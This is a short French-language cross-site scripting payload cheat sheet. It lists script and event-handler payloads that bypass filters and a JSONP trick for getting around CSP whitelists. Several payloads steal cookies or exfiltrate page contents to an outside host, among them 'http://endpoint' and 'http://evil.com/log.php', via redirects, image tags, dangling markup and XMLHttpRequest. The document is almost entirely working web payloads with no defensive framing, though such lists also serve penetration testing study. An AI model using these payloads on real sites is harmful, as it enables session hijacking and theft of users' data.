Exécuter du code

XSS sans filtres

<script>alert()</script>

Contourner filtres balises <script>

<img src="" onerror="alert()">
<body onload="alert()">

Récupérer les cookies d’un autre utilisateur

<script>document.location.replace("http://endpoint?cookie="+document.cookie)</script>

Sans redirection:

<script>document.write('<img src="http://endpoint?cookie='+document.cookie+'"')</script>

Exfiltration de données

Exfiltrer les données de la page actuel

<script>document.location.replace("http://endpoint?data="+document.body.innerText)</script>

Dangling Markup:

<img src="http://endpoint?data=
<meta http-equiv="refresh" content='0; url=http://evil.com/log.php?text=

Contourner les restrictions de Chrome:

<table background='//endpoint?data=

En utilisant Ajax

<script>
    var getData = new XMLHttpRequest();
    getData.open("GET", "http://page-where-data-is", false);
    getData.send();
    var sendData = new XMLHttpRequest();
    sendData.open("GET", "http://endpoint?data="+getData.responseText, false);
    sendData.send();
</script>

Utiliser les endpoints JSONP pour exploiter les whitelist CSP

<script src="http://jsonp-endpoint-which-is-in-whitelist?callback=alert()"></script>

Bypass common filters

You can use .concat() function instead of +

<script>document.location.replace("http://endpoint?cookie=".concat(document.cookie))</script>

Contourner les filtres sur les balises communes <script>, <img>, <a>, <body>

<button onfocus="alert()" autofocus>
<details ontoggle="alert()" open>payload</details>
<svg><animate onbegin="alert()" attributeName=x dur=1s>
<svg><animate onend="alert()" attributeName=x dur=1s>
<svg><animate onrepeat="alert()" attributeName=x dur=1s repeatCount=2 />
<svg><set onbegin="alert()" attributename=x dur=1s>